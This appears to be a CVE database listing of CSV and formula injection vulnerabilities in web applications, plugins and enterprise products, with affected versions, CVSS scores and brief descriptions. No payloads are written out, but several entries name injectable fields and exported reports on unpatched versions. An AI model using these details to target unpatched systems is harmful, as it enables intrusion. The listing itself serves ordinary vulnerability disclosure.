Total
280 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2022-1194 | 1 Mobileeventsmanager | 1 Mobile Events Manager | 2024-11-21 | N/A | 8.8 HIGH |
|
The Mobile Events Manager WordPress plugin before 1.4.8 does not properly escape the Enquiry source field when exporting events, or the Paid for field when exporting transactions as CSV, leading to a CSV injection vulnerability.
|
|||||
| CVE-2022-0142 | 1 Vfbpro | 1 Visual Form Builder | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
|
The Visual Form Builder WordPress plugin before 3.0.8 is vulnerable to CSV injection allowing a user with low level or no privileges to inject a command that will be included in the exported CSV file, leading to possible code execution.
|
|||||
| CVE-2021-46363 | 1 Magnolia-cms | 1 Magnolia Cms | 2024-11-21 | 9.3 HIGH | 7.8 HIGH |
|
An issue in the Export function of Magnolia v6.2.3 and below allows attackers to perform Formula Injection attacks via crafted CSV/XLS files. These formulas may result in arbitrary code execution on a victim's computer when opening the exported files with Microsoft Excel.
|
|||||
| CVE-2021-43515 | 1 Kimai | 1 Kimai | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH |
|
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in creating new timesheet in Kimai. By filling the Description field with malicious payload, it will be mistreated while exporting to a CSV file.
|
|||||
| CVE-2021-43257 | 1 Mantisbt | 1 Mantisbt | 2024-11-21 | 6.0 MEDIUM | 7.8 HIGH |
|
Lack of Neutralization of Formula Elements in the CSV API of MantisBT before 2.25.3 allows an unprivileged attacker to execute code or gain access to information when a user opens the csv_export.php generated CSV file in Excel.
|
|||||
| CVE-2021-41824 | 1 Craftcms | 1 Craft Cms | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
|
Craft CMS before 3.7.14 allows CSV injection.
|
|||||
| CVE-2021-41270 | 2 Fedoraproject, Sensiolabs | 2 Fedora, Symfony | 2024-11-21 | 4.0 MEDIUM | 6.5 MEDIUM |
|
Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula injection. In Symfony 4.1, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\t`. Since then, OWASP added ...
Show More |
|||||
| CVE-2021-40848 | 1 Mahara | 1 Mahara | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH |
|
In Mahara before 20.04.5, 20.10.3, 21.04.2, and 21.10.0, exported CSV files could contain characters that a spreadsheet program could interpret as a command, leading to execution of a malicious string locally on a device, aka CSV injection.
|
|||||
| CVE-2021-3188 | 1 Phplist | 1 Phplist | 2024-11-21 | 10.0 HIGH | 9.8 CRITICAL |
|
phpList 3.6.0 allows CSV injection, related to the email parameter, and /lists/admin/ exports.
|
|||||
| CVE-2021-39022 | 1 Ibm | 1 Guardium Data Encryption | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
|
IBM Guardium Data Encryption (GDE) 4.0.0.0 and 5.0.0.0 saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. IBM X-Force ID: 213858.
|
|||||
| CVE-2021-38424 | 1 Deltaww | 1 Dialink | 2024-11-21 | 6.8 MEDIUM | 5.9 MEDIUM |
|
The tag interface of Delta Electronics DIALink versions 1.2.4.0 and prior is vulnerable to an attacker injecting formulas into the tag data. Those formulas may then be executed when it is opened with a spreadsheet application.
|
|||||
| CVE-2021-37702 | 1 Pimcore | 1 Pimcore | 2024-11-21 | 6.5 MEDIUM | 8.0 HIGH |
|
Pimcore is an open source data & experience management platform. Prior to version 10.1.1, Data Object CSV import allows formular injection. The problem is patched in 10.1.1. Aside from upgrading, one may apply the patch manually as a workaround.
|
|||||
| CVE-2021-37131 | 1 Huawei | 3 Imanager Neteco, Imanager Neteco 6000, Manageone | 2024-11-21 | 6.0 MEDIUM | 6.8 MEDIUM |
|
There is a CSV injection vulnerability in ManageOne, iManager NetEco and iManager NetEco 6000. An attacker with high privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.
|
|||||
| CVE-2021-36334 | 1 Dell | 1 Emc Cloud Link | 2024-11-21 | 6.0 MEDIUM | 5.9 MEDIUM |
|
Dell EMC CloudLink 7.1 and all prior versions contain a CSV formula Injection Vulnerability. A remote high privileged attacker, may potentially exploit this vulnerability, leading to arbitrary code execution on end user machine
|
|||||
| CVE-2021-33256 | 1 Zohocorp | 1 Manageengine Adselfservice Plus | 2024-11-21 | 9.3 HIGH | 8.8 HIGH |
|
A CSV injection vulnerability on the login panel of ManageEngine ADSelfService Plus Version: 6.1 Build No: 6101 can be exploited by an unauthenticated user. The j_username parameter seems to be vulnerable and a reverse shell could be obtained if a privileged user exports "User Attempts Audit Report" as CSV file. Note: The vendor disputes this vulnerability, claiming "This is not a valid vulnerability in our ADSSP product. We don't see this as a security issue at our side.
|
|||||
| CVE-2021-29667 | 2 Ibm, Linux | 2 Spectrum Scale, Linux Kernel | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH |
|
IBM Spectrum Scale 5.0.0 through 5.0.5.6 and 5.1.0 through 5.1.0.2 is potentially vulnerable to CSV Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 199403.
|
|||||
| CVE-2021-27839 | 1 Bigprof | 1 Online Invoicing System | 2024-11-21 | 5.8 MEDIUM | 4.4 MEDIUM |
|
A CSV injection vulnerability found in Online Invoicing System (OIS) 4.3 and below can be exploited by users to perform malicious actions such as redirecting admins to unknown or harmful websites, or disclosing other clients' details that the user did not have access to.
|
|||||
| CVE-2021-27020 | 1 Puppet | 1 Puppet Enterprise | 2024-11-21 | 6.8 MEDIUM | 8.8 HIGH |
|
Puppet Enterprise presented a security risk by not sanitizing user input when doing a CSV export.
|
|||||
| CVE-2021-25962 | 1 Shuup | 1 Shuup | 2024-11-21 | 6.8 MEDIUM | 8.0 HIGH |
|
“Shuup” application in versions 0.4.2 to 2.10.8 is affected by the “Formula Injection” vulnerability. A customer can inject payloads in the name input field in the billing address while buying a product. When a store administrator accesses the reports page to export the data as an Excel file and opens it, the payload gets executed.
|
|||||
| CVE-2021-25960 | 1 Salesagility | 1 Suitecrm | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH |
|
In “SuiteCRM” application, v7.11.18 through v7.11.19 and v7.10.29 through v7.10.31 are affected by “CSV Injection” vulnerability (Formula Injection). A low privileged attacker can use accounts module to inject payloads in the input fields. When an administrator access accounts module to export the data as a CSV file and opens it, the payload gets executed. This was not fixed properly as part of CVE-2020-15301, allowing the attacker to bypass the security measure.
|
|||||
| CVE-2021-24441 | 1 Fetchdesigns | 1 Sign-up Sheets | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH |
|
The Sign-up Sheets WordPress plugin before 1.0.14 does not not sanitise or validate the Sheet title when generating the CSV to export, which could lead to a CSV injection issue
|
|||||
| CVE-2021-24144 | 1 Ciphercoin | 1 Contact Form 7 Database Addon | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH |
|
Unvalidated input in the Contact Form 7 Database Addon plugin, versions before 1.2.5.6, was prone to a vulnerability that lets remote attackers inject arbitrary formulas into CSV files.
|
|||||
| CVE-2021-24016 | 1 Fortinet | 1 Fortimanager | 2024-11-21 | 9.3 HIGH | 3.7 LOW |
|
An improper neutralization of formula elements in a csv file in Fortinet FortiManager version 6.4.3 and below, 6.2.7 and below allows attacker to execute arbitrary commands via crafted IPv4 field in policy name, when exported as excel file and opened unsafely on the victim host.
|
|||||
| CVE-2021-23654 | 1 Html-to-csv Project | 1 Html-to-csv | 2024-11-21 | 7.5 HIGH | 5.6 MEDIUM |
|
This affects all versions of package html-to-csv. When there is a formula embedded in a HTML page, it gets accepted without any validation and the same would be pushed while converting it into a CSV file. Through this a malicious actor can embed or generate a malicious link or execute commands via CSV files.
|
|||||
| CVE-2021-23286 | 1 Eaton | 1 Intelligent Power Manager | 2024-11-21 | 7.9 HIGH | 5.7 MEDIUM |
|
Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) version 1.5.0plus205 and all prior versions are vulnerable to CSV Formula Injection. This issue affects: Eaton Intelligent Power Manager Infrastructure (IPM Infrastructure) all version 1.5.0plus205 and prior versions.
|
|||||
| CVE-2021-22771 | 1 Schneider-electric | 2 Easergy T300, Easergy T300 Firmware | 2024-11-21 | 6.0 MEDIUM | 7.3 HIGH |
|
A CWE-1236: Improper Neutralization of Formula Elements in a CSV File vulnerability exists in Easergy T300 with firmware V2.7.1 and older that would allow arbitrary command execution.
|
|||||
| CVE-2021-22153 | 1 Blackberry | 1 Unified Endpoint Management | 2024-11-21 | 6.0 MEDIUM | 7.3 HIGH |
|
A Remote Code Execution vulnerability in the Management Console component of BlackBerry UEM version(s) 12.13.1 QF2 and earlier and 12.12.1a QF6 and earlier could allow an attacker to potentially cause the spreadsheet application to run commands on the victim’s local machine with the authority of the user.
|
|||||
| CVE-2021-21302 | 1 Prestashop | 1 Prestashop | 2024-11-21 | 6.5 MEDIUM | 6.8 MEDIUM |
|
PrestaShop is a fully scalable open source e-commerce solution. In PrestaShop before version 1.7.2 there is a CSV Injection vulnerability possible by using shop search keywords via the admin panel. The problem is fixed in 1.7.7.2
|
|||||
| CVE-2021-1475 | 1 Cisco | 1 Umbrella | 2024-11-21 | 3.5 LOW | 6.5 MEDIUM |
|
Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
|
|||||
| CVE-2021-1474 | 1 Cisco | 1 Umbrella | 2024-11-21 | 6.8 MEDIUM | 6.5 MEDIUM |
|
Multiple vulnerabilities in the Admin audit log export feature and Scheduled Reports feature of Cisco Umbrella could allow an authenticated, remote attacker to perform formula and link injection attacks on an affected device. For more information about these vulnerabilities, see the Details section of this advisory.
|
|||||
| CVE-2020-9466 | 1 Export Users To Csv Project | 1 Export Users To Csv | 2024-11-21 | 5.8 MEDIUM | 6.1 MEDIUM |
|
The Export Users to CSV plugin through 1.4.2 for WordPress allows CSV Injection.
|
|||||
| CVE-2020-9372 | 1 Codepeople | 1 Appointment Booking Calendar | 2024-11-21 | 6.8 MEDIUM | 7.8 HIGH |
|
The Appointment Booking Calendar plugin before 1.3.35 for WordPress allows user input (in fields such as Description or Name) in any booking form to be any formula, which then could be exported via the Bookings list tab in /wp-admin/admin.php?page=cpabc_appointments.php. The attacker could achieve remote code execution via CSV injection.
|
|||||
| CVE-2020-9347 | 1 Zohocorp | 1 Manageengine Password Manager Pro | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
|
Zoho ManageEngine Password Manager Pro through 10.x has a CSV Excel Macro Injection vulnerability via a crafted name that is mishandled by the Export Passwords feature. NOTE: the vendor disputes the significance of this report because they expect CSV risk mitigation to be provided by an external application, and do not plan to add CSV constraints to their own products
|
|||||
| CVE-2020-9205 | 1 Huawei | 1 Manageone | 2024-11-21 | 4.0 MEDIUM | 4.9 MEDIUM |
|
There has a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.
|
|||||
| CVE-2020-9200 | 1 Huawei | 1 Imanager Neteco 6000 | 2024-11-21 | 7.2 HIGH | 7.8 HIGH |
|
There has a CSV injection vulnerability in iManager NetEco 6000 versions V600R021C00. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device.
|
|||||
| CVE-2020-9017 | 1 Litecart | 1 Litecart | 2024-11-21 | 6.0 MEDIUM | 8.0 HIGH |
|
LiteCart through 2.2.1 allows CSV injection via a customer's profile.
|
|||||
| CVE-2020-7947 | 1 Auth0 | 1 Login By Auth0 | 2024-11-21 | 7.5 HIGH | 9.8 CRITICAL |
|
An issue was discovered in the Login by Auth0 plugin before 4.0.0 for WordPress. It has numerous fields that can contain data that is pulled from different sources. One issue with this is that the data isn't sanitized, and no input validation is performed, before the exporting of the user data. This can lead to (at least) CSV injection if a crafted Excel document is uploaded.
|
|||||
| CVE-2020-7049 | 1 Nozominetworks | 1 Guardian | 2024-11-21 | 8.5 HIGH | 7.3 HIGH |
|
Nozomi Networks OS before 19.0.4 allows /#/network?tab=network_node_list.html CSV Injection.
|
|||||
| CVE-2020-4759 | 1 Ibm | 1 Filenet Content Manager | 2024-11-21 | 9.3 HIGH | 7.8 HIGH |
|
IBM FileNet Content Manager 5.5.4 and 5.5.5 is potentially vulnerable to CVS Injection. A remote attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-Force ID: 188736.
|
|||||
| CVE-2020-4689 | 1 Ibm | 1 Security Guardium | 2024-11-21 | 8.5 HIGH | 6.8 MEDIUM |
|
IBM Security Guardium 11.2 is vulnerable to CVS Injection. A remote privileged attacker could execute arbitrary commands on the system, caused by improper validation of csv file contents. IBM X-ForceID: 186696.
|
|||||